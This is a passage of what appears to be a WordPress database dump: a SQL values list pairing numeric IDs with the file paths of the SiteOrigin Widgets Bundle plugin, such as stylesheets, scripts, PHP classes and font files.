plugins/so-widgets-bundle/base/css/admin.css'),(2838,'wp-content/plugins/so-widgets-bundle/base/css/img/arrow-down.png'),(2839,'wp-content/plugins/so-widgets-bundle/base/css/img/arrow-right.png'),(2840,'wp-content/plugins/so-widgets-bundle/base/css/img/bundle-icon.png'),(2841,'wp-content/plugins/so-widgets-bundle/base/css/img/close-white.png'),(2842,'wp-content/plugins/so-widgets-bundle/base/css/img/close.png'),(2843,'wp-content/plugins/so-widgets-bundle/base/css/img/loading.gif'),(2844,'wp-content/plugins/so-widgets-bundle/base/css/img/menu-icon.svg'),(2845,'wp-content/plugins/so-widgets-bundle/base/css/img/order-asc.png'),(2846,'wp-content/plugins/so-widgets-bundle/base/css/img/order-desc.png'),(2847,'wp-content/plugins/so-widgets-bundle/base/css/img/ordering-icons.png'),(2848,'wp-content/plugins/so-widgets-bundle/base/css/img/thumbnail-placeholder.png'),(2849,'wp-content/plugins/so-widgets-bundle/base/css/img/wpspin_light-2x.gif'),(2850,'wp-content/plugins/so-widgets-bundle/base/css/img/wpspin_light.gif'),(2851,'wp-content/plugins/so-widgets-bundle/base/css/preview.css'),(2852,'wp-content/plugins/so-widgets-bundle/base/inc/Parsedown.php'),(2853,'wp-content/plugins/so-widgets-bundle/base/inc/actions.php'),(2854,'wp-content/plugins/so-widgets-bundle/base/inc/array-utils.php'),(2855,'wp-content/plugins/so-widgets-bundle/base/inc/attachments.php'),(2856,'wp-content/plugins/so-widgets-bundle/base/inc/color.php'),(2857,'wp-content/plugins/so-widgets-bundle/base/inc/fields/autocomplete.class.php'),(2858,'wp-content/plugins/so-widgets-bundle/base/inc/fields/base.class.php'),(2859,'wp-content/plugins/so-widgets-bundle/base/inc/fields/builder.class.php'),(2860,'wp-content/plugins/so-widgets-bundle/base/inc/fields/checkbox.class.php'),(2861,'wp-content/plugins/so-widgets-bundle/base/inc/fields/checkboxes.class.php'),(2862,'wp-content/plugins/so-widgets-bundle/base/inc/fields/code.class.php'),(2863,'wp-content/plugins/so-widgets-bundle/base/inc/fields/color.class.php'),(2864,'wp-content/plugins/so-widgets-bundle/base/inc/fields/container-base.class.php'),(2865,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/date-range-field.css'),(2866,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/icon-field.css'),(2867,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/image-radio-field.css'),(2868,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/images/wpspin_light-2x.gif'),(2869,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/images/wpspin_light.gif'),(2870,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/measurement-field.css'),(2871,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/media-field.css'),(2872,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/multi-measurement-field.css'),(2873,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/order-field.css'),(2874,'wp-content/plugins/so-widgets-bundle/base/inc/fields/css/tinymce-field.css'),(2875,'wp-content/plugins/so-widgets-bundle/base/inc/fields/date-range.class.php'),(2876,'wp-content/plugins/so-widgets-bundle/base/inc/fields/error.class.php'),(2877,'wp-content/plugins/so-widgets-bundle/base/inc/fields/factory.class.php'),(2878,'wp-content/plugins/so-widgets-bundle/base/inc/fields/font.class.php'),(2879,'wp-content/plugins/so-widgets-bundle/base/inc/fields/icon.class.php'),(2880,'wp-content/plugins/so-widgets-bundle/base/inc/fields/image-radio.class.php'),(2881,'wp-content/plugins/so-widgets-bundle/base/inc/fields/image-size.class.php'),(2882,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/autocomplete-field.js'),(2883,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/autocomplete-field.min.js'),(2884,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/code-field.js'),(2885,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/code-field.min.js'),(2886,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/date-range-field.js'),(2887,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/date-range-field.min.js'),(2888,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/icon-field.js'),(2889,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/icon-field.min.js'),(2890,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/image-radio-field.js'),(2891,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/image-radio-field.min.js'),(2892,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/media-field.js'),(2893,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/media-field.min.js'),(2894,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/multi-measurement-field.js'),(2895,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/multi-measurement-field.min.js'),(2896,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/order-field.js'),(2897,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/order-field.min.js'),(2898,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/posts-field.js'),(2899,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/posts-field.min.js'),(2900,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/presets-field.js'),(2901,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/presets-field.min.js'),(2902,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/tinymce-field-pre48.js'),(2903,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/tinymce-field-pre48.min.js'),(2904,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/tinymce-field.js'),(2905,'wp-content/plugins/so-widgets-bundle/base/inc/fields/js/tinymce-field.min.js'),(2906,'wp-content/plugins/so-widgets-bundle/base/inc/fields/link.class.php'),(2907,'wp-content/plugins/so-widgets-bundle/base/inc/fields/measurement.class.php'),(2908,'wp-content/plugins/so-widgets-bundle/base/inc/fields/media.class.php'),(2909,'wp-content/plugins/so-widgets-bundle/base/inc/fields/multi-measurement.class.php'),(2910,'wp-content/plugins/so-widgets-bundle/base/inc/fields/number.class.php'),(2911,'wp-content/plugins/so-widgets-bundle/base/inc/fields/order.class.php'),(2912,'wp-content/plugins/so-widgets-bundle/base/inc/fields/posts.class.php'),(2913,'wp-content/plugins/so-widgets-bundle/base/inc/fields/presets.class.php'),(2914,'wp-content/plugins/so-widgets-bundle/base/inc/fields/radio.class.php'),(2915,'wp-content/plugins/so-widgets-bundle/base/inc/fields/repeater.class.php'),(2916,'wp-content/plugins/so-widgets-bundle/base/inc/fields/section.class.php'),(2917,'wp-content/plugins/so-widgets-bundle/base/inc/fields/select.class.php'),(2918,'wp-content/plugins/so-widgets-bundle/base/inc/fields/siteorigin-widget-field-class-loader.class.php'),(2919,'wp-content/plugins/so-widgets-bundle/base/inc/fields/slider.class.php'),(2920,'wp-content/plugins/so-widgets-bundle/base/inc/fields/text-input-base.class.php'),(2921,'wp-content/plugins/so-widgets-bundle/base/inc/fields/text.class.php'),(2922,'wp-content/plugins/so-widgets-bundle/base/inc/fields/textarea.class.php'),(2923,'wp-content/plugins/so-widgets-bundle/base/inc/fields/tinymce.class.php'),(2924,'wp-content/plugins/so-widgets-bundle/base/inc/fields/widget.class.php'),(2925,'wp-content/plugins/so-widgets-bundle/base/inc/fonts.php'),(2926,'wp-content/plugins/so-widgets-bundle/base/inc/less-functions.php'),(2927,'wp-content/plugins/so-widgets-bundle/base/inc/lessc.inc.php'),(2928,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Autoloader.php'),(2929,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Cache.php'),(2930,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Colors.php'),(2931,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Configurable.php'),(2932,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Environment.php'),(2933,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Exception/Chunk.php'),(2934,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Exception/Compiler.php'),(2935,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Exception/Parser.php'),(2936,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Functions.php'),(2937,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Less.php.combine'),(2938,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Mime.php'),(2939,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Output/Mapped.php'),(2940,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Output.php'),(2941,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Parser.php'),(2942,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/SourceMap/Base64VLQ.php'),(2943,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/SourceMap/Generator.php'),(2944,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Alpha.php'),(2945,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Anonymous.php'),(2946,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Assignment.php'),(2947,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Attribute.php'),(2948,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Call.php'),(2949,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Color.php'),(2950,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Comment.php'),(2951,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Condition.php'),(2952,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/DefaultFunc.php'),(2953,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/DetachedRuleset.php'),(2954,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Dimension.php'),(2955,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Directive.php'),(2956,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Element.php'),(2957,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Expression.php'),(2958,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Extend.php'),(2959,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Import.php'),(2960,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Javascript.php'),(2961,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Keyword.php'),(2962,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Media.php'),(2963,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Mixin/Call.php'),(2964,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Mixin/Definition.php'),(2965,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/NameValue.php'),(2966,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Negative.php'),(2967,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Operation.php'),(2968,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Paren.php'),(2969,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Quoted.php'),(2970,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Rule.php'),(2971,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Ruleset.php'),(2972,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/RulesetCall.php'),(2973,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Selector.php'),(2974,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/UnicodeDescriptor.php'),(2975,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Unit.php'),(2976,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/UnitConversions.php'),(2977,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Url.php'),(2978,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Value.php'),(2979,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Variable.php'),(2980,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree.php'),(2981,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Version.php'),(2982,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/extendFinder.php'),(2983,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/import.php'),(2984,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/joinSelector.php'),(2985,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/processExtends.php'),(2986,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor/toCSS.php'),(2987,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Visitor.php'),(2988,'wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/VisitorReplacing.php'),(2989,'wp-content/plugins/so-widgets-bundle/base/inc/meta-box-manager.php'),(2990,'wp-content/plugins/so-widgets-bundle/base/inc/post-selector.php'),(2991,'wp-content/plugins/so-widgets-bundle/base/inc/routes/siteorigin-widgets-resource.class.php'),(2992,'wp-content/plugins/so-widgets-bundle/base/inc/routes/sowb-rest-routes.php'),(2993,'wp-content/plugins/so-widgets-bundle/base/inc/shortcode.php'),(2994,'wp-content/plugins/so-widgets-bundle/base/inc/string-utils.php'),(2995,'wp-content/plugins/so-widgets-bundle/base/inc/video.php'),(2996,'wp-content/plugins/so-widgets-bundle/base/inc/widget-manager.class.php'),(2997,'wp-content/plugins/so-widgets-bundle/base/inc/widgets/base-slider.class.php'),(2998,'wp-content/plugins/so-widgets-bundle/base/js/admin.js'),(2999,'wp-content/plugins/so-widgets-bundle/base/js/admin.min.js'),(3000,'wp-content/plugins/so-widgets-bundle/base/js/meta-box-manager.js'),(3001,'wp-content/plugins/so-widgets-bundle/base/js/meta-box-manager.min.js'),(3002,'wp-content/plugins/so-widgets-bundle/base/less/lesshat.less'),(3003,'wp-content/plugins/so-widgets-bundle/base/less/mixins.less'),(3004,'wp-content/plugins/so-widgets-bundle/base/siteorigin-widget.class.php'),(3005,'wp-content/plugins/so-widgets-bundle/compat/beaver-builder/beaver-builder.php'),(3006,'wp-content/plugins/so-widgets-bundle/compat/beaver-builder/sowb-beaver-builder.js'),(3007,'wp-content/plugins/so-widgets-bundle/compat/beaver-builder/sowb-beaver-builder.min.js'),(3008,'wp-content/plugins/so-widgets-bundle/compat/beaver-builder/styles.css'),(3009,'wp-content/plugins/so-widgets-bundle/compat/block-editor/widget-block.js'),(3010,'wp-content/plugins/so-widgets-bundle/compat/block-editor/widget-block.min.js'),(3011,'wp-content/plugins/so-widgets-bundle/compat/block-editor/widget-block.php'),(3012,'wp-content/plugins/so-widgets-bundle/compat/builders.php'),(3013,'wp-content/plugins/so-widgets-bundle/compat/compat.php'),(3014,'wp-content/plugins/so-widgets-bundle/compat/elementor/elementor.php'),(3015,'wp-content/plugins/so-widgets-bundle/compat/elementor/sowb-elementor.js'),(3016,'wp-content/plugins/so-widgets-bundle/compat/elementor/sowb-elementor.min.js'),(3017,'wp-content/plugins/so-widgets-bundle/compat/elementor/styles.css'),(3018,'wp-content/plugins/so-widgets-bundle/compat/visual-composer/front_enqueue_js.js'),(3019,'wp-content/plugins/so-widgets-bundle/compat/visual-composer/front_enqueue_js.min.js'),(3020,'wp-content/plugins/so-widgets-bundle/compat/visual-composer/siteorigin_widget_vc_template.php'),(3021,'wp-content/plugins/so-widgets-bundle/compat/visual-composer/sowb-vc-widget.js'),(3022,'wp-content/plugins/so-widgets-bundle/compat/visual-composer/sowb-vc-widget.min.js'),(3023,'wp-content/plugins/so-widgets-bundle/compat/visual-composer/styles.css'),(3024,'wp-content/plugins/so-widgets-bundle/compat/visual-composer/visual-composer.php'),(3025,'wp-content/plugins/so-widgets-bundle/css/lib/slick.css'),(3026,'wp-content/plugins/so-widgets-bundle/css/slider/fonts/slider.eot'),(3027,'wp-content/plugins/so-widgets-bundle/css/slider/fonts/slider.svg'),(3028,'wp-content/plugins/so-widgets-bundle/css/slider/fonts/slider.ttf'),(3029,'wp-content/plugins/so-widgets-bundle/css/slider/fonts/slider.woff'),(3030,'wp-content/plugins/so-widgets-bundle/css/slider/slider.css'),(3031,'wp-content/plugins/so-widgets-bundle/icons/elegantline/filter.php'),(3032,'wp-content/plugins/so-widgets-bundle/icons/elegantline/font/elegantline.eot'),(3033,'wp-content/plugins/so-widgets-bundle/icons/elegantline/font/elegantline.ttf'),(3034,'wp-content/plugins/so-widgets-bundle/icons/elegantline/font/elegantline.woff'),(3035,'wp-content/plugins/so-widgets-bundle/icons/elegantline/style.css'),(3036,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/filter.php'),(3037,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/style.css'),(3038,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.eot'),(3039,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.svg'),(3040,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.ttf'),(3041,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.woff'),(3042,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-brands-400.woff2'),(3043,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.eot'),(3044,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.svg'),(3045,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.ttf'),(3046,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.woff'),(3047,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-regular-400.woff2'),(3048,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.eot'),(3049,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.svg'),(3050,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.ttf'),(3051,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.woff'),(3052,'wp-content/plugins/so-widgets-bundle/icons/fontawesome/webfonts/fa-solid-900.woff2'),(3053,'wp-content/plugins/so-widgets-bundle/icons/genericons/filter.php'),(3054,'wp-content/plugins/so-widgets-bundle/icons/genericons/font/genericons.eot'),(3055,'wp-content/plugins/so-widgets-bundle/icons/genericons/font/genericons.ttf'),(3056,'wp-content/plugins/so-widgets-bundle/icons/genericons/font/genericons.woff'),(3057,'wp-content/plugins/so-widgets-bundle/icons/genericons/style.css'),(3058,'wp-content/plugins/so-widgets-bundle/icons/icomoon/filter.php'),(3059,'wp-content/plugins/so-widgets-bundle/icons/icomoon/font/icomoon.eot'),(3060,'wp-content/plugins/so-widgets-bundle/icons/icomoon/font/icomoon.svg'),(3061,'wp-content/plugins/so-widgets-bundle/icons/icomoon/font/icomoon.ttf'),(3062,'wp-content/plugins/so-widgets-bundle/icons/icomoon/font/icomoon.woff'),(3063,'wp-content/plugins/so-widgets-bundle/icons/icomoon/style.css'),(3064,'wp-content/plugins/so-widgets-bundle/icons/icons.php'),(3065,'wp-content/plugins/so-widgets-bundle/icons/ionicons/filter.php'),(3066,'wp-content/plugins/so-widgets-bundle/icons/ionicons/font/ionicons.eot'),(3067,'wp-content/plugins/so-widgets-bundle/icons/ionicons/font/ionicons.svg'),(3068,'wp-content/plugins/so-widgets-bundle/icons/ionicons/font/ionicons.ttf'),(3069,'wp-content/plugins/so-widgets-bundle/icons/ionicons/font/ionicons.woff'),(3070,'wp-content/plugins/so-widgets-bundle/icons/ionicons/style.css'),(3071,'wp-content/plugins/so-widgets-bundle/icons/licenses.txt'),(3072,'wp-content/plugins/so-widgets-bundle/icons/typicons/filter.php'),(3073,'wp-content/plugins/so-widgets-bundle/icons/typicons/font/typicons.eot'),(3074,'wp-content/plugins/so-widgets-bundle/icons/typicons/font/typicons.ttf'),(3075,'wp-content/plugins/so-widgets-bundle/icons/typicons/font/typicons.woff'),(3076,'wp-content/plugins/so-widgets-bundle/icons/typicons/style.css'),(3077,'wp-content/plugins/so-widgets-bundle/js/jquery.cycle.js'),(3078,'wp-content/plugins/so-widgets-bundle/js/jquery.cycle.min.js'),(3079,'wp-content/plugins/so-widgets-bundle/js/jquery.cycle.swipe.js'),(3080,'wp-content/plugins/so-widgets-bundle/js/jquery.cycle.swipe.min.js'),(3081,'wp-content/plugins/so-widgets-bundle/js/jquery.touchSwipe.js'),(3082,'wp-content/plugins/so-widgets-bundle/js/jquery.touchSwipe.min.js'),(3083,'wp-content/plugins/so-widgets-bundle/js/lib/imagesloaded.pkgd.js'),(3084,'wp-content/plugins/so-widgets-bundle/js/lib/imagesloaded.pkgd.min.js'),(3085,'wp-content/plugins/so-widgets-bundle/js/lib/packery.pkgd.js'),(3086,'wp-content/plugins/so-widgets-bundle/js/lib/packery.pkgd.min.js'),(3087,'wp-content/plugins/so-widgets-bundle/js/lib/pikaday.css'),(3088,'wp-content/plugins/so-widgets-bundle/js/lib/pikaday.jquery.js'),(3089,'wp-content/plugins/so-widgets-bundle/js/lib/pikaday.jquery.min.js'),(3090,'wp-content/plugins/so-widgets-bundle/js/lib/pikaday.js'),(3091,'wp-content/plugins/so-widgets-bundle/js/lib/pikaday.min.js'),(3092,'wp-content/plugins/so-widgets-bundle/js/lib/slick.js'),(3093,'wp-content/plugins/so-widgets-bundle/js/lib/slick.min.js'),(3094,'wp-content/plugins/so-widgets-bundle/js/slider/jquery.slider.js'),(3095,'wp-content/plugins/so-widgets-bundle/js/slider/jquery.slider.min.js'),(3096,'wp-content/plugins/so-widgets-bundle/js/sow.google-map.js'),(3097,'wp-content/plugins/so-widgets-bundle/js/sow.google-map.min.js'),(3098,'wp-content/plugins/so-widgets-bundle/js/sow.jquery.fittext.js'),(3099,'wp-content/plugins/so-widgets-bundle/js/sow.jquery.fittext.min.js'),(3100,'wp-content/plugins/so-widgets-bundle/lang/so-widgets-bundle.pot'),(3101,'wp-content/plugins/so-widgets-bundle/readme.txt'),(3102,'wp-content/plugins/so-widgets-bundle/so-widgets-bundle.php'),(3103,'wp-content/plugins/so-widgets-bundle/widgets/accordion/accordion.php'),(3104,'wp-content/plugins/so-widgets-bundle/widgets/accordion/assets/banner.svg'),(3105,'wp-content/plugins/so-widgets-bundle/widgets/accordion/js/accordion.js'),(3106,'wp-content/plugins/so-widgets-bundle/widgets/accordion/js/accordion.min.js'),(3107,'wp-content/plugins/so-widgets-bundle/widgets/accordion/styles/default.less'),(3108,'wp-content/plugins/so-widgets-bundle/widgets/accordion/tpl/default.php'),(3109,'wp-content/plugins/so-widgets-bundle/widgets/button/assets/banner.svg'),(3110,'wp-content/plugins/so-widgets-bundle/widgets/button/button.php'),(3111,'wp-content/plugins/so-widgets-bundle/widgets/button/css/style.css'),(3112,'wp-content/plugins/so-widgets-bundle/widgets/button/styles/atom.less'),(3113,'wp-content/plugins/so-widgets-bundle/widgets/button/styles/flat.less'),(3114,'wp-content/plugins/so-widgets-bundle/widgets/button/styles/wire.less'),(3115,'wp-content/plugins/so-widgets-bundle/widgets/button/tpl/default.php'),(3116,'wp-content/plugins/so-widgets-bundle/widgets/contact/assets/banner.svg'),(3117,'wp-content/plugins/so-widgets-bundle/widgets/contact/contact.php'),(3118,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/base.class.php'),(3119,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/checkboxes.class.php'),(3120,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/email.class.php'),(3121,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/name.class.php'),(3122,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/radio.class.php'),(3123,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/select.class.php'),(3124,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/subject.class.php'),(3125,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/tel.class.php'),(3126,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/text.class.php'),(3127,'wp-content/plugins/so-widgets-bundle/widgets/contact/fields/textarea.class.php'),(3128,'wp-content/plugins/so-widgets-bundle/widgets/contact/js/contact.js'),(3129,'wp-content/plugins/so-widgets-bundle/widgets/contact/js/contact.min.js'),(3130,'wp-content/plugins/so-widgets-bundle/widgets/contact/styles/default.less'),(3131,'wp-content/plugins/so-widgets-bundle/widgets/contact/tpl/default.php'),(3132,'wp-content/plugins/so-widgets-bundle/widgets/cta/assets/banner.svg'),(3133,'wp-content/plugins/so-widgets-bundle/widgets/cta/css/style.css'),(3134,'wp-content/plugins/so-widgets-bundle/widgets/cta/cta.php'),(3135,'wp-content/plugins/so-widgets-bundle/widgets/cta/js/cta.js'),(3136,'wp-content/plugins/so-widgets-bundle/widgets/cta/js/cta.min.js'),(3137,'wp-content/plugins/so-widgets-bundle/widgets/cta/styles/default.less'),(3138,'wp-content/plugins/so-widgets-bundle/widgets/cta/tpl/default.php'),(3139,'wp-content/plugins/so-widgets-bundle/widgets/editor/assets/banner.svg'),(3140,'wp-content/plugins/so-widgets-bundle/widgets/editor/editor.php'),(3141,'wp-content/plugins/so-widgets-bundle/widgets/editor/tpl/default.php'),(3142,'wp-content/plugins/so-widgets-bundle/widgets/features/assets/banner.svg'),(3143,'wp-content/plugins/so-widgets-bundle/widgets/features/css/fonts/feature-background.eot'),(3144,'wp-content/plugins/so-widgets-bundle/widgets/features/css/fonts/feature-background.svg'),(3145,'wp-content/plugins/so-widgets-bundle/widgets/features/css/fonts/feature-background.ttf'),(3146,'wp-content/plugins/so-widgets-bundle/widgets/features/css/fonts/feature-background.woff'),(3147,'wp-content/plugins/so-widgets-bundle/widgets/features/css/fonts/readme.txt'),(3148,'wp-content/plugins/so-widgets-bundle/widgets/features/css/style.css'),(3149,'wp-content/plugins/so-widgets-bundle/widgets/features/features.php'),(3150,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/explode.svg'),(3151,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/frame.svg'),(3152,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/hex.svg'),(3153,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/octagon.svg'),(3154,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/round.svg'),(3155,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/rounded-hex.svg'),(3156,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/rounded-square.svg'),(3157,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/rounded-sticker.svg'),(3158,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/square.svg'),(3159,'wp-content/plugins/so-widgets-bundle/widgets/features/images/containers/sticker.svg'),(3160,'wp-content/plugins/so-widgets-bundle/widgets/features/inc/containers.php'),(3161,'wp-content/plugins/so-widgets-bundle/widgets/features/styles/default.less'),(3162,'wp-content/plugins/so-widgets-bundle/widgets/features/tpl/default.php'),(3163,'wp-content/plugins/so-widgets-bundle/widgets/google-map/assets/banner.svg'),(3164,'wp-content/plugins/so-widgets-bundle/widgets/google-map/css/style.css'),(3165,'wp-content/plugins/so-widgets-bundle/widgets/google-map/fields/css/location-field.css'),(3166,'wp-content/plugins/so-widgets-bundle/widgets/google-map/fields/js/location-field.js'),(3167,'wp-content/plugins/so-widgets-bundle/widgets/google-map/fields/js/location-field.min.js'),(3168,'wp-content/plugins/so-widgets-bundle/widgets/google-map/fields/location.class.php'),(3169,'wp-content/plugins/so-widgets-bundle/widgets/google-map/google-map.php'),(3170,'wp-content/plugins/so-widgets-bundle/widgets/google-map/js/static-map.js'),(3171,'wp-content/plugins/so-widgets-bundle/widgets/google-map/js/static-map.min.js'),(3172,'wp-content/plugins/so-widgets-bundle/widgets/google-map/tpl/js-map.php'),(3173,'wp-content/plugins/so-widgets-bundle/widgets/google-map/tpl/static-map.php'),(3174,'wp-content/plugins/so-widgets-bundle/widgets/headline/assets/banner.svg'),(3175,'wp-content/plugins/so-widgets-bundle/widgets/headline/headline.php'),(3176,'wp-content/plugins/so-widgets-bundle/widgets/headline/styles/default.less'),(3177,'wp-content/plugins/so-widgets-bundle/widgets/headline/tpl/default.php'),(3178,'wp-content/plugins/so-widgets-bundle/widgets/hero/assets/banner.svg'),(3179,'wp-content/plugins/so-widgets-bundle/widgets/hero/hero.php'),(3180,'wp-content/plugins/so-widgets-bundle/widgets/hero/styles/default.less'),(3181,'wp-content/plugins/so-widgets-bundle/widgets/hero/tpl/default.php'),(3182,'wp-content/plugins/so-widgets-bundle/widgets/icon/assets/banner.svg'),(3183,'wp-content/plugins/so-widgets-bundle/widgets/icon/icon.php'),(3184,'wp-content/plugins/so-widgets-bundle/widgets/icon/styles/default.less'),(3185,'wp-content/plugins/so-widgets-bundle/widgets/icon/tpl/default.php'),(3186,'wp-content/plugins/so-widgets-bundle/widgets/image/assets/banner.svg'),(3187,'wp-content/plugins/so-widgets-bundle/widgets/image/image.php'),(3188,'wp-content/plugins/so-widgets-bundle/widgets/image/styles/default.less'),(3189,'wp-content/plugins/so-widgets-bundle/widgets/image/tpl/default.php'),(3190,'wp-content/plugins/so-widgets-bundle/widgets/image-grid/assets/banner.svg'),(3191,'wp-content/plugins/so-widgets-bundle/widgets/image-grid/image-grid.php'),(3192,'wp-content/plugins/so-widgets-bundle/widgets/image-grid/js/image-grid.js'),(3193,'wp-content/plugins/so-widgets-bundle/widgets/image-grid/js/image-grid.min.js'),